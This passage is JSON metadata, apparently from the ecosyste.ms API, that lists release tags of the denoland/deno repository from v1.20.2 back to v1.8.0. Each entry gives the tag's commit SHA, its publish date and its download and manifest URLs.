ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0